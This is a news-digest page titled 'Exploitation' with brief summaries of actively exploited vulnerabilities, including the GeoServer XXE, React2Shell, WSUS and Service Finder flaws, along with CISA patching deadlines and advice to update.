Exploitation
-
CISA orders immediate patching after active exploitation of critical GeoServer XXE flaw
CISA has ordered federal agencies to patch a critical unauthenticated XML External Entity flaw in GeoServer (CVE-2025-58360) that is being actively exploited; researchers warn the bug can disclose files and enable SSRF, and public scans show thousands of exposed instances.
-
CISA sets Dec. 12 deadline to patch React2Shell RSC flaw amid widespread exploitation
CISA has set a December 12 deadline for federal agencies to patch the critical React2Shell RSC vulnerability CVE-2025-55182 after widespread exploitation was observed; security firms report rapid, opportunistic scans and attacks against Next.js and other internet-facing services.
-
Attackers exploit patched WSUS flaw to deploy infostealer on unpatched Windows servers
Attackers have been observed exploiting CVE-2025-59287 in WSUS to deploy an infostealer on unpatched Windows servers, exfiltrate data to webhook.site URLs and use follow-up tooling including Velociraptor and a UPX-packed Skuld Stealer; agencies and vendors are urging immediate patching and investigation.
-
Attackers exploiting critical auth-bypass flaw in Service Finder WordPress theme
Security researchers at Wordfence say attackers are actively exploiting CVE-2025-5947, a critical authentication-bypass flaw in the Service Finder WordPress theme that can give attackers administrator access; a patch was released in version 6.1 and administrators are urged to update or stop using the theme.
-
CISA Identifies Four Critical Vulnerabilities Under Active Exploitation
CISA has identified four critical vulnerabilities under active exploitation, urging organizations to take immediate action to update their systems to protect against potential threats.
-
Exploitation of Vulnerabilities on the Rise: 159 CVEs Flagged in Q1 2025
A recent report reveals that 159 CVEs were flagged as exploited in Q1 2025, highlighting a growing trend in vulnerability exploitation within cybersecurity. Urgent actions are needed to mitigate such risks amid rising threats.
